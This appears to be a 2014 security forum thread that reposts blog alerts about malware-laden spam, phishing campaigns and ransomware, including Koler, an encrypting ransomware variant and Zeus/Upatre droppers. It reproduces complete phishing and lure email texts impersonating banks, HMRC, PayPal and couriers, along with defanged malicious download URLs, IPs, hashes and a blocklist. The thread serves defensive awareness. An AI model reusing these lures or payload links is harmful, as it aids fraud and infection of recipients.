In this most recent change in encrypting ransomware. Instead of going after various file extensions, all files are encrypted into RTF documents with a *.enc.rtf extension. This one really blind sides the victim as you’ll get no pop up GUI or webpage once encryption completes; you have to open one of your documents to find that it was encrypted. All documents will have the same content similar to what is shown. One big improvement that is quite nasty for victims is the encryption is no longer a static one time deal. This variant will actively seek out and encrypt any new or modified files written to drives. We noticed while testing a collected sample that when we attempted to save screenshots, that it immediately encrypted them. We expect future encrypting ransomware variants to include these tactics as the evolution continues..."

:mad::mad: :fear:

AplusWebMaster
2014-05-06, 22:39
FYI...

Hacked WordPress site - ccccooa .org
- http://blog.dynamoo.com/2014/05/ccccooaorg-another-hacked-wordpress-site.html
6 May 2014 - "ccccooa .org ("Cumberland County Council on Older Adults") is another hacked WordPress site being used to serve pharma spam. I got -82- of these all at the same time..
From: Linkedln Email Confirmation [emailing@ compumundo .info]
Reply-To: emailing@ compumundo .info
To: topsailes@ gmail .com
Date: 6 May 2014 13:41
Subject: Please confirm your email address
Linkedln
Click here to confirm your email address.
You will be asked to log into your account to confirm this email address. Be sure to log in with your current primary email address.
We ask you to confirm your email address before sending invitations or requesting contacts at Linkedln. You can have several email addresses, but one will need to be confirmed at all times to use the system.
If you have more than one email address, you can choose one to be your primary email address. This is the address you will log in with, and the address to which we will deliver all email messages regarding invitations and requests, and other system mail.
Thank you for using Linkedln!
--The Linkedln Team
This email was intended for [redacted]. Learn why we included this...

One example landing URL is [donotclick]www.ccccooa .org/buyphentermine/ which leads to a sort of intermediary landing page..
> https://3.bp.blogspot.com/-yHYRE10WZKE/U2iyLsDXtXI/AAAAAAAAC9Q/sX68XuZLzYw/s1600/fake-rx-1.png
This is turn goes to a -redirected- at [donotclick]stylespanel .com/h/go/phentermine.php and then to [donotclick]www.hq-pharmacy-online .com/search.html?q=phentermine which is a -fake- pharmacy site hosted on 95.211.228.240 (LeaseWeb, Netherlands) which is registered to a probably fake address in Argentina. Avoid.. oh, and if you run a WordPress site please make sure the software is up-to-date."
___

BT Digital File - SPAM
- http://blog.dynamoo.com/2014/05/important-bt-digital-file-spam.html
6 May 2014 - "This -fake- BT spam comes with a malicious attachment:
Date: Tue, 6 May 2014 15:18:15 +0700 [04:18:15 EDT]
From: Santiago Biggs [Santiago.Biggs@ bt .com]
Subject: Important - BT Digital File
BT Digital Vault BT
Dear Customer,
This email contains your BT Digital File. Please scan attached file and reply to this email.
If you have any questions or forgotten your password, please visit the "Frequently Asked Questions" at www.bt .com/personal/digitalvault/help or call the helpdesk on 0870 240 1116* between 8am and midnight.
Thank you for choosing BT Digital Vault.
Kind regards,
BT Digital Vault Team ...
Please note that this is an automatically generated email for your information only. We are sorry, but we can not respond to a "Reply" to this address...

Screenshot: https://2.bp.blogspot.com/-3lQPEJML0rA/U2i3EZQnyXI/AAAAAAAAC9c/eTXtmThsu-Q/s1600/bt.png

Attached to the message is an archive file BT_Digital_Vault_File.zip which in turn contains a malicious executable BT_Digital_File.scr which has a VirusTotal detection rate of 11/52*. Automated analysis tools... show that this malware downloads additional components from the following locations:
[donotclick]realtech-international .com/css/0605UKdp.rar
[donotclick]biz-ventures .net/scripts/0605UKdp.rar
Blocking those URLs or monitoring for them may help to prevent further infection."
* https://www.virustotal.com/en/file/8b910ac5a4f15c278e3e32386612e24454d05abfd2b08e374b12da5149ba690f/analysis/1399371324/
___

Fake MMS message – jpg malware
- http://myonlinesecurity.co.uk/new-mms-message-fake-jpg-malware/
6 May 2014 - "... message pretending to come from 01552521415@ mmsreply.t-mobile .co .uk [NBdnO_0K0Cb8VYiYEpV8ozYauXw7swqpIiIs6nK3@ mmsreply.t-mobile .co .uk] is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Email reads:
our message:
Guess what I forgot *handoverface*, see attached pic
Sending a reply:
You can reply by email to this mobile number within the next 7 days.
The total message size should not exceed 300kb.
You can only reply once, and it must be within 7 days of receiving this message...

Todays Date: PIC000444182547.zip (53 kb) Extracts to PIC000983339211.jpeg.exe
Current Virus total detections: 6/52*
... another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper jpg file instead of the .exe file it really is... look carefully at the unzipped file. If it says .EXE then it is a problem and should not be run or opened."
* https://www.virustotal.com/en/file/b7e3aee53ffebd6b0c58e59c64bb146967b63b25ce1d0987ebc1ee87e8bc47fd/analysis/
___

Fake Payment error SPAM – malware
- http://myonlinesecurity.co.uk/payment-error-25393592410-malware/
6 May 2014 - "Payment error #25393592410 pretending to come from Orville Creasy [payment@ rachelwarne .co .uk] is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers...
Email looks like :
This e-mail has been sent to you to inform you that we were unable to process your most recent payment #570475658997219860277606
Please check attached file for more detailed information on this transaction.
Pay To Account Number: 8843867223806343
Date: 2014-05-05 15:19:19 UTC.
Transaction ID: 25393592410
Amount Due: £ 1060.45
Orville Creasy,
+07957419543

The number on the email subject is different in every email as are the transaction numbers, the pay to account number, the amount due and alleged sender and his/her phone number. The email senders are all different and the only thing in common is that they all pretend to be sent from payment @ some random named but real company. The companies have not been hacked. They just use the name of a company from a long list... unless you have “show known file extensions enabled“, will look like a file with an icon of a £ sign pretending to be a specialised invoice instead of the .exe file it really is..."

:fear::fear: :mad::mad:

AplusWebMaster
2014-05-07, 12:32
FYI...

Fake invoice file attachment SPAM
- http://blog.dynamoo.com/2014/05/this-email-contains-invoice-file.html
7 May 2014 - "Another case of a very terse spam with a malicious email attachment:
Date: Wed, 7 May 2014 14:06:46 +0700 [03:06:46 EDT]
From: Accounts Dept [menopausaln54@ jaygee .co .uk]
Subject: Email invoice: 1888443
This email contains an invoice file attachment

... The attachment is emailinvoice.069911.zip which in turn contains a malicious executable emailinvoice.899191.exe which has a VirusTotal detection rate of 5/52*. Automated analysis tools of this binary... shows that it downloads a further component... This "111.exe" binary has an even lower VirusTotal detection rate of 3/51**. Automated analysis of this... shows the malware installs itself deeply into the target system. There is a further dowload of a malicious binary from files.karamellasa .gr/tvcs_russia/2.exe which has a detection rate of 5/50*** and identifies as a variant of Zeus. This creates fake svchost.exe and csrss.exe executables on the target system..."
(More detail at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/c5bd87f921d3a162d5d79a472ebee697fb88748f60ee47d9b2ea1d5b2714fc90/analysis/1399448792/

** https://www.virustotal.com/en-gb/file/94d3a69c238f43d299ec715e014d3e1cb7f6abe3f7fcf7837e3dba89fcd10384/analysis/1399450008/

*** https://www.virustotal.com/en-gb/file/54bd07e5ddcd04bdc746060bfc7ddfe7d20b77a167a44760a4aabec03d499819/analysis/1399450683/
___

Fake Lloyds Banking BACs – fake PDF malware
- http://myonlinesecurity.co.uk/lloyds-commercial-banking-important-bacs-fake-pdf-malware/
7 May 2014 - "Lloyds Commercial Banking Important BACs pretending to be from Lloyds Commercial Banking [Ora.Hutchison@ lloydsbank .com]is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers... Email looks like:
Important account documents
Reference: C96 Case number: 0746481
Please review attached BACs documents and fax it to +44 (0) 845 600 9454.
Please note that the Terms and Conditions available below are the Bank’s most recently issued versions. Please bear in mind that earlier versions of these Terms and Conditions may apply to your products, depending on when you signed up to the relevant product or when you were last advised of any changes to your Terms and Conditions. If you have any questions regarding which version of the Terms and Conditions apply to your products, please contact your Relationship Manager.
Yours faithfully
Adrienne Mcdermott Senior Manager, Lloyds Commercial Banking ...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/05/lloyds-Important-BACs.png

7 May 2014 : LloydsCase-8948231.zip ( 11kb) Extracts to LloydsCase-07052014.scr
Current Virus total detections: 3/51*
... another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is... make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should not be run or opened."
* https://www.virustotal.com/en/file/1b9b7a7a3d81a8956281ff7e13d553b52fd484509588b4bcc0d97f5f831156c3/analysis/
___

Fake "TNT UK Limited" SPAM
- http://blog.dynamoo.com/2014/05/tnt-uk-limited-spam.html
7 May 2014 - "This -fake- TNT spam has a malicious attachment:
Date: Wed, 7 May 2014 01:50:00 -0600 [03:50:00 EDT]
From: TNT COURIER SERVICE [tracking@tnt.co.uk]
Subject: TNT UK Limited - Package tracking 236406937389
TNT COURIER SERVICE (TCS)
Customer/Delivery Services Department
Central Pk Est/Mosley Rd, Trafford Park
Manchester, M17 1TT UK.
DETAILS OF PACKAGE
Reg order no: GB5766211
Your package have been picked up and is ready for dispatch. Please print attached form
and pick up at the nearest office.
Connote # : 236406937389
Service Type : Export Non Documents - Intl
Shipped on : 07 Apr 13 00:00
Order No : 5766211
Status : Driver's Return Description : Wrong Postcode ...

The attachment is GB5766211.zip which contains the malicious executable GB07052014.scr (note the date is encoded into the filename). This has a VirusTotal detection rate of 7/52*. Automated analysis tools... show a UDP connection to wavetmc .com and a further binary download from demo.providenthousing .com/wp-content/uploads/2014/05/b01.exe . This second executable has a VirusTotal detection rate of 20/51**. The Malwr report and Anubis report both show attempted connection to various mail servers (e.g. Gmail and Hotmail). Furthermore the Anubis report shows a data transfer to 83.172.8.59 (Tomsk Telecommunication Company, Russia).
Recommended blocklist:
83.172.8.59
wavetmc .com
demo.providenthousing .com"
* https://www.virustotal.com/en-gb/file/1b9b7a7a3d81a8956281ff7e13d553b52fd484509588b4bcc0d97f5f831156c3/analysis/1399452001/

** https://www.virustotal.com/en-gb/file/e7468b216fe8ea9010a3e739daeb4b39642a24d87f3f98ccf28b4293bf6196d1/analysis/1399452578/
___

More PUPs - using Instagram as Lure
- http://blog.malwarebytes.org/security-threat/2014/05/more-pups-sighted-using-instagram-as-lure/
May 7, 2014 - "... In the case of Instagram, what we’ve seen out there could pose greater risk than, say, your average phishing site. Doing a Google search surely yields sites where one can download several programs involving Instagram. Some of which can either be classed as “image viewers” or “image and video downloaders” publicly-accessible accounts. Most of the files I sampled below belong to the latter:
> http://blog.malwarebytes.org/wp-content/uploads/2014/05/instagram.png
Since Instagram can be visited via Web browsers, we can easily say that these downloads target any Windows computer user who just want to keep copies of photos and videos that are likely not their own. We ran these potentially unwanted programs (PUPs) on VirusTotal and got the following...
1) https://www.virustotal.com/en/file/d6495ffb6a0c388ae4d5b81c16ef4bdaee4604491b21d857d0955378336d4c84/analysis/1398865443/
2) https://www.virustotal.com/en/file/d6495ffb6a0c388ae4d5b81c16ef4bdaee4604491b21d857d0955378336d4c84/analysis/1398865443/
3) https://www.virustotal.com/en/file/d65fd9b672bfc1093df20f0b9a7c6f812426c7b45085d04137d07b4a794830ba/analysis/1398864970/
(More listed at the malwarebytes URL at the top.)
... Internet slowdown, unwanted redirection to sites and possible installation of other programs without the user’s consent are just some of the obvious signs users may experience once these programs are installed. Like what we always advise our blog readers, please avoid downloading such programs onto your system as doing so will increase its security risks..."
___

Fake Google+ Survey - Phish ...
- http://www.hoax-slayer.com/fraudulent-verification-survey-phishing-scam.shtml
May 7, 2014 - "Email purporting to be from the 'All Domain Mail Team' at Google+ asks recipients to participate in a 'spam and fraudulent verification survey'. The email is -not- from Google+ or anybody else at Google. It is a phishing scam designed to trick users into giving their Google account login details to criminals...

Screenshot: http://www.hoax-slayer.com/images/fraudulent-verification-survey-phishing-scam-1.jpg

... claims to be from the 'All Domain Mail Team' at Google's social network Google+. It claims that the team is running a 'spam and fraudulent verification survey' and asks users to click a link to participate. It warns that if the verification survey is 'not gotten' within 24 hours, the team will assume that the recipient is a 'fraulent user' and his or her email account will be shut down... These login details will be collected by criminals and used to hijack the Google accounts belonging to the victims. The one set of login credentials can be used to access many different Google services. Thus, the criminals may be able to steal private information stored in various Google applications as well as use Gmail and Google+ accounts to launch further spam and scam campaigns..."

:mad::mad: :fear:

AplusWebMaster
2014-05-08, 14:11
FYI...

Infected malformed PDF attachments to emails
- http://myonlinesecurity.co.uk/infected-malformed-pdf-attachments-emails/
8 May 2014 - "We are now seeing lots of infected -malformed- PDF attachments to emails. The bad guys are changing the method of malware delivery with these emails and attaching a genuine PDF file to the email instead of a zip. These PDFs are -malformed- and contain a script virus that will infect you if you open the PDF and very likely when you preview it in your browser. They are using several well known and hopefully fully fixed exploits in older versions of Adobe reader. They attach what appears to be a genuine PDF file, that is malformed and has a script virus embedded. It depends on which version of Adobe reader you use, but older ones are definitely vulnerable to this exploit... It is vital that you make sure Adobe PDF reader is updated to the latest version 11.0.6* and if you use any alternative PDF reader then make sure that is fully updated. The majority of PDF exploits will affect ALL PDF readers, not just Adobe... these malformed PDFs do -not- preview and appear as plain blank pages in Windows 7 and Windows 8. The other thing that will help to avoid being unwittingly infected by these is to Set Adobe reader or any other PDF reader to open PDFs in the program and NOT in your browser... it is much safer to view them in the application itself which should be sand-boxed to prevent exploits slipping out..."
* https://helpx.adobe.com/security/products/reader/apsb14-01.html
___

Koler Trojan or other ransomware on Android
- http://blog.malwarebytes.org/mobile-2/2014/05/difficulty-removing-koler-trojan-or-other-ransomware-on-android/
May 7, 2014 - "A new Android ransomware dubbed Koler has been spreading as a fake adult themed streaming service ‘BaDoink’ app. Uncovered by security researcher Kafeine*, Koler uses familiar “Police Locker” tactics to get victims to pay a ransom for unlocking their PC or device. Traced back to the team that brought us the Reverton ransomware, Koler uses FBI and other police agency symbols to look legitimate, as well as carefully crafted text.
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/05/akoler04b.jpg
While your files and other data are not encrypted by Koler.a, the annoying browser page takes over as the active window. Koler is delivered with site redirection, once installed and running the device is taken over by the ransom browser page, pressing the Home button or attempting to dismiss the page works for a very short time. The page will reappear when you attempt to open another app or within a few seconds. This causes removal problems because you don’t have enough time to uninstall through normal methods. Removal: The good news is you don’t have to pay the ransom to remove. First off, Malwarebytes Anti-Malware Mobile** detects as Android/Trojan.Koler.a and will prevent and remove this Trojan on your Android device. However, at times there are race conditions where Koler’s page is up and has control of the screen or you might not have a security tool installed... Safe Mode: The quickest manual solution would be to use Android’s Safe Mode, similar to Windows, Safe Mode is a diagnostic environment where third-party apps won’t load and you can remove..."
(See the Complete procedure at the malwarebytes URL above.)
* http://malware.dontneedcoffee.com/2014/05/police-locker-available-for-your.html

** https://www.malwarebytes.org/mobile/

Related: http://www.webroot.com/blog/2014/05/07/android-koler-android-based-ransomware/
May 7, 2014
- http://blog.kaspersky.com/new-ransomware-for-android/
May 8, 2014

:fear: :mad:

AplusWebMaster
2014-05-09, 15:49
FYI...

Fake HMRC SPAM / VAT0781569.zip
- http://blog.dynamoo.com/2014/05/hmrc-spam-vat0781569zip.html
9 May 2014 - "This -fake- HMRC spam comes with a malicious attachment:
Date: Fri, 9 May 2014 12:47:49 +0530 [03:17:49 EDT]
From: "noreply@ hmrc .gov .uk" [noreply@ hmrc .gov .uk]
Subject: Successful Receipt of Online Submission for Reference 0781569
Thank you for sending your VAT Return online. The submission for reference 0781569 was
successfully received on Fri, 9 May 2014 12:47:49 +0530 and is being processed. Make VAT
Returns is just one of the many online services we offer that can save you time and
paperwork.
For the latest information on your VAT Return please open attached report.
The original of this email was scanned for viruses by the Government Secure Intranet
virus scanning service supplied by Cable&Wireless Worldwide in partnership with
MessageLabs. (CCTM Certificate Number 2009/09/0052.) On leaving the GSi this email was
certified virus free.
Communications via the GSi may be automatically logged, monitored and/or recorded for
legal purposes.

It says "On leaving the GSi this email was certified virus free" which (as you might suspect) is utter bollocks, because it comes with a malicious payload. Attached to the message is an archive VAT0781569.zip which in turn contains two identical malicious executables AccountDocuments.scr and VAT090514.scr which have a VirusTotal detection rate of 15/52*. This is part one of the infection chain. Automated analysis... shows that components are then downloaded from the following locations:
[donotclick]bmclines .com/0905UKdp.rar
[donotclick]gamesofwar .net/img/icons/0905UKdp.rar
[donotclick]entslc .com/misc/farbtastic/heap170id3.exe
[donotclick]distrioficinas .com/css/b01.exe
The malicious binary heap170id3.exe has a VirusTotal detection rate of 9/52**. Automated analysis... shows that this makes a connection to a server at 94.23.32.170 (OVH, France). The other malicious binary, b01.exe had a VirusTotal detection rate of 11/52***. Analysis of this shows... that it attempts to connect to several different email services, presumably to send out spam."
* https://www.virustotal.com/en-gb/file/544a92787e291b3cad2d081be36616d49fb7d817f2aaac1a03e402f9a8404b6c/analysis/1399629443/

** https://www.virustotal.com/en-gb/file/1e8bf6e8b5188e28815ee6f28699c1df80d5ec3e541eca81c60fe2b9798e0850/analysis/1399629644/

*** https://www.virustotal.com/en-gb/file/e52554b0e4a717b7281abc8da4bba2c02a5636406d6db48fd20fb17a34ebdc0c/analysis/1399629683/
___

Fake Trusteer Security Update – PDF malware
- http://myonlinesecurity.co.uk/trusteer-important-security-update-fake-pdf-malware/
9 May 2014 - "... pretending to be from Trusteer Support is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Email reads:
Customer Number: 4086477
Important Security Update
Online Banking Protection Software Update from Trusteer
— THIS IS AN AUTOMATED RESPONSE. NO REPLY IS NECESSARY —
Please be sure to restart your computer after installing the new update
Sincerely, Trusteer Technical Support
Your internet banking account is valuable to fraudsters. That’s why criminals are always looking for new ways to get your online banking details and penetrate your account. Anti-virus and firewalls can’t detect the latest attacks, leaving you vulnerable.
To protect you against online fraud, please take a moment to Update Rapport – dedicated online banking security software from the experts at Trusteer. It only takes a few minutes to download and install, and there’s no need to restart your computer...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/05/Trusteer_Important-Security-Update.png

9 May 2014: derek_RaportUpdate.zip (24 kb) Extracts to Trusteer Update Now.scr
Current Virus total detections: 8/52* ...
This Important Security Update is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/b9510d6593b753aeb20f741a82f9ea3a96e6195bbc7a96a20ef954cf57632aff/analysis/

- http://threattrack.tumblr.com/post/85215426458/trusteer-spam
May 9, 2014
Tagged: Trusteer, Upatre

:mad: :fear::fear:

AplusWebMaster
2014-05-12, 22:18
FYI...

Fake PayPal SPAM – PDF malware
- http://myonlinesecurity.co.uk/paypal-notification-payment-received-fake-pdf-malware/
12 May 2014 - "PayPal Notification of payment received is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. These emails are absolutely identical to the genuine emails that you receive from PayPal when someone sends you money, especially after selling something on eBay . The difference is the link to the transaction goes to a fake site that tries to download a malware file to your computer, that appears to be a PDF...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/05/paypal_new_funds.png

12 May 2014: PP_detalis_726716942049.pdf.exe ( 485 kb)
Current Virus total detections: 0/51*
This PayPal Notification of payment received is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/fef606db754a8397d52fcb830934caace186e09a3dd80f865389d867c31e265f/analysis/
___

BBB SPAM - Washington Metro Area ...
- http://threattrack.tumblr.com/post/85542924523/better-business-bureau-of-washington-metro-area-spam
12 May 2014 - "Subjects Seen:
RE:Case #2475314
Typical e-mail details:
Owner/Manager
The Better Business Bureau has received the above-referenced complaint from one of your customers regarding their dealings with you. The details of the consumer’s concern are included on the reverse. Please review this matter and advise us of your position. FILE ATTACHED (Adobe Photoshop format)
As a neutral third party, the Better Business Bureau can help to resolve the matter. Often complaints are a result of misunderstandings a company wants to know about and correct...
We look forward to your prompt attention to this matter.
Sincerely, BBB of Metropolitan Washington DC and Eastern Pennsylvania

Malicious File Name and MD5:
Complaint.zip (F72C05A0A0C4C188B07ECE7806CC0F44)
ComplaintToManager.scr (F89D06A787094FE2DC1AF6B2C0914C17)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/9e0c566c3d7d004c164e1c0521c93446/tumblr_inline_n5h4knHQFX1r6pupn.png

Tagged: bbb, Upatre

- http://myonlinesecurity.co.uk/better-business-bureau-complaint-fake-pdf-malware/
12 May 2014 - "Better Business Bureau Complaint with subject of RE:Case #8396880 pretending to come from Refugio Ratliff [Refugio_Ratliff@ bbb .org] is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers...
Email looks like:
May 12, 2014
Owner/Manager
The Better Business Bureau has received the above-referenced complaint from one of your customers regarding their dealings with you. The details of the consumer’s concern are included on the reverse. Please review this matter and advise us of your position. FILE ATTACHED (Adobe Photoshop format)
As a neutral third party, the Better Business Bureau can help to resolve the matter. Often complaints are a result of misunderstandings a company wants to know about and correct...
We look forward to your prompt attention to this matter.
Sincerely,
BBB of Metropolitan Washington DC and Eastern Pennsylvania

12 May 2014 : Complaint.zip ( 7kb) Extracts to ComplaintToManager.scr
Current Virus total detections: 2/52*
... another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/6c7d3eb6880978486664a7e408c0cbbd35dd9ef8608874e94107564b12012998/analysis/
___

“Your Photos Are being Used” Phish
- http://blog.malwarebytes.org/fraud-scam/2014/05/your-photos-are-being-used-phishing-lure/
May 12, 2014 - "We’re seeing some reports that an old favourite of scammers everywhere is currently in circulation on social media sites such as Tumblr. If you receive a message from a friend which says:
OMG YOUR PHOTOS ARE BEING USED ON THIS SITE
then be very careful should you happen to click the link, because you may well be sent to a fake login page. In this case, the scammers use some Javascript to bounce the victim from a Tumblr spam blog to a fake Facebook login which they’ll need to use to see the supposed photos. Anybody filling in their details and hitting enter will of course have their username and password sent to the attacker.
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/05/tumblr.png
...
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/05/phish-fb.png
This sort of scam is often seen on Twitter, and regularly puts in a guest appearance or twelve on other sites. Any urgent-sounding messages sent your way which suggest imminent personal embarrassment of some description should be treated with healthy skepticism until you’ve confirmed that a) the message is genuine and b) it really was worth saving up for a one way ticket to the Sahara desert all those years ago. It’s very likely you’re going to be fine – however, you won’t be able to say the same for accounts being handed over to a scammer using a little shock and awe (but mostly shock) as a bait to spirit away some logins."
___

- http://blog.trendmicro.com/trendlabs-security-intelligence/phishers-cast-wider-net-now-asking-for-multiple-emails/
May 12, 2014 - "... Users should be wary of clicking shortened URLs, especially if they come from unverified sources. It’s recommended that they simply use bookmarks or type in the site’s URL directly into the address bar to avoid phishing pages. They should also double-check a site’s URL before they give out any user information; it has become all too easy for bad guys to create login pages that are near-identical to legitimate ones..."

:mad: :fear::fear:

AplusWebMaster
2014-05-14, 13:42
FYI...

Paypal Phish Flood
- http://blog.malwarebytes.org/fraud-scam/2014/05/paypal-phishing-flood/
May 13, 2014 - "... noticed a trend in phishing scams over the last week, namely that a specific style of PayPal phish e-mail has been flooding potential victims. The text of the phishing e-mail includes:
Dear Member,
Recently, there's been activity in your PayPal account that seems unusual compared to your normal account activities. Pleaselog in to PayPal to confirm your identity and update your password and security questions.
To help protect your account, no one can send money or withdraw money. In addition, no one can close your account, send refunds,remove any bank accounts, or remove credit cards.
Click here to login <- Phishing Page
What's going on?
We're concerned that someone is using your PayPal account without your knowledge. Recent activity on your account seems tohave occurred from a suspicious location or under circumstances that may be different than usual.
What to do
Log in to your PayPal account as soon as possible. We may ask you to confirm information you provided when you created your account to make sure you're the account holder. We'll then ask you to change your password and security questions...

They then advise to wait until PayPal responds within 72 hours after all tasks are complete, however we know that by that time, any credit or accounts associated with your PayPal login are likely to be compromised. We have seen a massive amount of domains being employed to host the actual phishing page, which looks like this:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/05/imgmediatortimes.com_-_PayPal_Phish.png
In addition to the many locations this -scam- is being hosted, the amount of observed IP addresses sending the phishing attack is so far over 500. So keep an eye out for any such scam. In addition, there seems something oddly ‘phishy’ about the pattern of these attacks and as we uncover more we will update this post..."
___

Fake Computer Support Services invoice – PDF malware
- http://myonlinesecurity.co.uk/computer-support-services-fake-invoice-fake-pdf-malware/
13 May 2014 - "Computer Support Services fake invoice with subject of Computer Support Services JJBCL0104291 pretending to come from Computer Support Services < random names @ blacjj .co .uk > is another one from the current bot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers... email looks like
Dear Carole We have created a new invoice for you. To view your statement including a pdf of this invoice please download the attachment.
Invoice Details
Invoice Number:
Description: 1/4/14 – 30/4/14
Amount: £67.80
Payment Details
Account Number: 01706454
Sort Code: 400822
Account Name: Computer Support Services
Kind Regards, Jennifer Eden Computer Support Services T: 0161 8505080 F: 0161 929 0049 W: www. blackjj .co .uk

13 May 2014 Report_ID30D74D9365D2AC998DC.zip (63 kb) : Extracts to invoice_65476859394857_pdf.exe
Current Virus total detections: 0/52*
This Computer Support Services fake invoice is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/26dfd88fc6bbb40f6ccc9379160a6a65931eab1ba70734ba1f06cb4056cb56e7/analysis/
___

[b]Citibank Commercial Banking Form Spam
- http://threattrack.tumblr.com/post/85731142878/citibank-commercial-banking-form-spam
May 14, 2014 - "Subjects Seen:
Important - Commercial Form
Typical e-mail details:
Please scan attached document and fax it to +1 800-285-6016 .
All web filed documents (with the exception of downloaded accounts templates) are available to view / download for 10 days after their original submission. Once accepted, these changes will be displayed on the public record. Not yet filing your accounts online? See how easy it is… For enquiries, please telephone the Service Desk on +1 800-285-0106 or email enquiries@ citibank .com. This email was sent from a notification-only email address which cannot accept incoming mail. Please do not reply directly to this message. .
Yours faithfully
Lilly Mccann
Commercial Banking
Citibank N.A
Lilly.Mccann@ citibank .com

Malicious File Name and MD5:
CommercialForm.zip (5881899D33E80B0B33139BBDED43D9BB)
CommercialForm.scr (F7F5269B1031FF35B8F4DF1000CBCBBB)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/12d37a6e4d32484f3ea6283c63542d9f/tumblr_inline_n5koqnxVdL1r6pupn.png

Tagged: Citibank, Upatre
___

Microsoft Exchange Voice mail Spam
- http://threattrack.tumblr.com/post/85725818528/microsoft-exhange-voice-mail-spam
May 14, 2014 - "Subjects Seen:
You have received a voice mail
Typical e-mail details:
You received a voice mail : VOICE933-947-8474.wav (24 KB)
Caller-Id: 933-947-8474
Message-Id: XA6TL3
Email-Id: <email address>
This e-mail contains a voice message.
Download and extract the attachment to listen the message.
Sent by Microsoft Exchange Server

Malicious File Name and MD5:
VoiceMail.zip (B41AF487FC1D362DF736EAC5E14CF5FF)
VoiceMail.scr (DDBA4AD13DE7D5AE604729405C180D65)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/a8dcfb3209de8ba149afaed92a5e21d9/tumblr_inline_n5kl642QEg1r6pupn.png

Tagged: Voicemail, Upatre

:fear::fear: :mad:

AplusWebMaster
2014-05-15, 19:19
FYI...

Fake NatWest SPAM ...
- http://myonlinesecurity.co.uk/natwest-statement/
15 May 2014 - "NatWest Statement is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers... Email looks like:
View Your April 2014 Online Financial Activity Statement
Keep track of your account with your latest Online Financial Activity Statement from NatWest Bank. It’s available for you to view at this secure site. Just click to select how you would like to view your statement:
View/Download as a PDF
View all EStatements
So check out your statement right away, or at your earliest convenience...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/05/natwest-statement.png

15 may 2014 : Statement-pdf.zip (14 kb) : Extracts to Statement-pdf.scr
Current Virus total detections: 7/53*
This NatWest Statement is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/513946f92ace2ba7733a7d7d922a23c31c28ab60163ba91f63aede8aca271030/analysis/

- http://blog.dynamoo.com/2014/05/natwest-statement-spam-contains-bitly.html
15 May 2014 - "This -fake- NatWest spam sends victims to a malicious download via a bit.ly link... The link in the email goes to [donotclick]bit .ly/1jKW2GJ which then downloads a malicious file Statement-pdf.scr which has a VirusTotal detection rate of 8/53*...
* https://www.virustotal.com/en-gb/file/513946f92ace2ba7733a7d7d922a23c31c28ab60163ba91f63aede8aca271030/analysis/1400164292/
___

Fake 401K Fund Spam
- http://threattrack.tumblr.com/post/85822053523/401k-fund-performance-spam
May 15, 2014 - "Subjects Seen:
401k April 2014 Fund Performance and Participant Communication
Typical e-mail details:
Co-op 401k Plan Participants
Attached you will find the April 2014 401k fund performance results as well as an informational piece regarding online calculators available on the website.
If you are a facility manager, please forward, print or post a copy of these pages on your bulletin board or in a conspicuous place where your employees can see them.
Please contact me if you have any questions.
Elsie Mosley
Employee Benefits/Plan Administrator...

Malicious File Name and MD5:
April-2014-401k-Fund.zip (B5B2231F7110B15F70DB7968134A5A98)
April-2014-401k-Fund.scr (81928270710BAD7443BDBCAA253E4094)

